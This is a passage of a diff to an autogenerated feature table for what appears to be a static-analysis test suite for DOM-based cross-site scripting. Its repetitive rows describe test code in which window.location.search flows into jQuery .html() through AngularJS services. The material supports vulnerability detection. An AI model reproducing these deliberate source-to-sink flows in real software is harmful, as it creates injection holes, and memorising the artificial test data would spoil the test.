    ").html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:27 | $("
    ").html | contextSurroundingFunctionParameters | ()\n(xssSourceService) | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:27 | $("
    ").html | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:27 | $("
    ").html | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:27 | $("
    ").html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:47 | $("
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:47 | $("
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:155:13:155:47 | exceptional return of $("
    " | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:155:15:155:21 | "
    " | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:155:15:155:21 | "
    " | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16637,6 +115418,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:155:15:155:21 | "
    " | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | | autogenerated/Xss/DomBasedXss/tst.js:155:15:155:21 | "
    " | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:155:15:155:21 | "
    " | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:155:24:155:27 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:155:24:155:27 | html | contextSurroundingFunctionParameters | ()\n(xssSourceService) | +| autogenerated/Xss/DomBasedXss/tst.js:155:24:155:27 | html | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:155:24:155:27 | html | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:155:24:155:27 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:155:29:155:44 | xssSourceService | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:155:29:155:44 | xssSourceService | contextSurroundingFunctionParameters | ()\n(xssSourceService) | +| autogenerated/Xss/DomBasedXss/tst.js:155:29:155:44 | xssSourceService | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:155:29:155:44 | xssSourceService | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:155:29:155:44 | xssSourceService | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:155:29:155:46 | exceptional return of xssSourceService() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:155:29:155:46 | exceptional return of xssSourceService() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:155:29:155:46 | exceptional return of xssSourceService() | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:155:29:155:46 | exceptional return of xssSourceService() | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:155:29:155:46 | exceptional return of xssSourceService() | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:155:29:155:46 | xssSourceService() | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:155:29:155:46 | xssSourceService() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:155:29:155:46 | xssSourceService() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16644,6 +115440,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:155:29:155:46 | xssSourceService() | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | | autogenerated/Xss/DomBasedXss/tst.js:155:29:155:46 | xssSourceService() | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:155:29:155:46 | xssSourceService() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:157:10:157:16 | factory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:157:10:157:16 | factory | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:157:10:157:16 | factory | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:157:10:157:16 | factory | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:157:10:157:16 | factory | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:157:18:157:35 | "xssSourceService" | CalleeFlexibleAccessPath | angular.module().factory().factory().factory().factory | | autogenerated/Xss/DomBasedXss/tst.js:157:18:157:35 | "xssSourceService" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:157:18:157:35 | "xssSourceService" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16651,6 +115452,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:157:18:157:35 | "xssSourceService" | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | | autogenerated/Xss/DomBasedXss/tst.js:157:18:157:35 | "xssSourceService" | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:157:18:157:35 | "xssSourceService" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:157:37 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:157:37 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:157:37 | this | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:157:37 | this | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:157:37 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | 'arguments' object of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | 'arguments' object of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | exceptional return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | exceptional return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | exceptional return of anonymous function | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | functio ... } | CalleeFlexibleAccessPath | angular.module().factory().factory().factory().factory | | autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | functio ... } | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | functio ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16658,6 +115474,66 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | functio ... } | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | | autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | functio ... } | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | functio ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:157:38:159:9 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:19 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:19 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:19 | this | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:19 | this | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:19 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | 'arguments' object of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | 'arguments' object of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | exceptional return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | exceptional return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | exceptional return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | functio ... earch } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | functio ... earch } | contextSurroundingFunctionParameters | ()\n()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | functio ... earch } | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
